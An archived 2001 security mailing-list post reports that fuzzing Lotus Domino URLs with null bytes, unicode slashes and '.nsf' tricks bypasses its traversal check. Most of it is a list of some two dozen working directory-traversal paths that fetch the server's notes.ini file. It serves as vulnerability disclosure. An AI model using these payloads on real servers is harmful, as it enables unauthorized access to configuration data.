|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Moonen, Ralph (Moonen.Ralph
KPMG.NL)Date: Fri Jan 12 2001 - 07:44:59 CST
I made a loop testing all combinations of up to 4 of the following elements:
(I just selected som elements that would yield possibly interesting stuff,
including
a unicode encoding of '/', like in the IIS unicode bug)
/
..
/..
../
.nsf
%20
%c0%af
%00
I then did an HTTP GET of:
GET /<COMBI>/lotus/domino/notes.ini HTTP/1.0
and found that the following combinations all get the desired notes.ini
file:
/%00%00.nsf/../lotus/domino/notes.ini
/%00%20.nsf/../lotus/domino/notes.ini
/%00%c0%af.nsf/../lotus/domino/notes.ini
/%00...nsf/../lotus/domino/notes.ini
/%00.nsf//../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/%00.nsf/..//lotus/domino/notes.ini
/%00.nsf/../../lotus/domino/notes.ini
/%00.nsf.nsf/../lotus/domino/notes.ini
/%20%00.nsf/../lotus/domino/notes.ini
/%20.nsf//../lotus/domino/notes.ini
/%20.nsf/..//lotus/domino/notes.ini
/%c0%af%00.nsf/../lotus/domino/notes.ini
/%c0%af.nsf//../lotus/domino/notes.ini
/%c0%af.nsf/..//lotus/domino/notes.ini
/...nsf//../lotus/domino/notes.ini
/...nsf/..//lotus/domino/notes.ini
/.nsf///../lotus/domino/notes.ini
/.nsf//../lotus/domino/notes.ini
/.nsf//..//lotus/domino/notes.ini
/.nsf/../lotus/domino/notes.ini
/.nsf/..//lotus/domino/notes.ini
/.nsf/..///lotus/domino/notes.ini
/.nsf%00.nsf/../lotus/domino/notes.ini
/.nsf.nsf//../lotus/domino/notes.ini
/.nsf.nsf/..//lotus/domino/notes.ini
Of course some of these are duplicates, since // gets parsed to / allthough
not always!
Some experiments show that strange things also happen when %00 or somesuch
is prepended...
For instance:
/.nsf/../../lotus/domino/notes.ini
gives the ".. Forbidden, don't try to break in" message, while
/%00.nsf/../../lotus/domino/notes.ini
serves up the file just fine!
--Ralph
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.
This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses.
www.mimesweeper.com
**********************************************************************
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]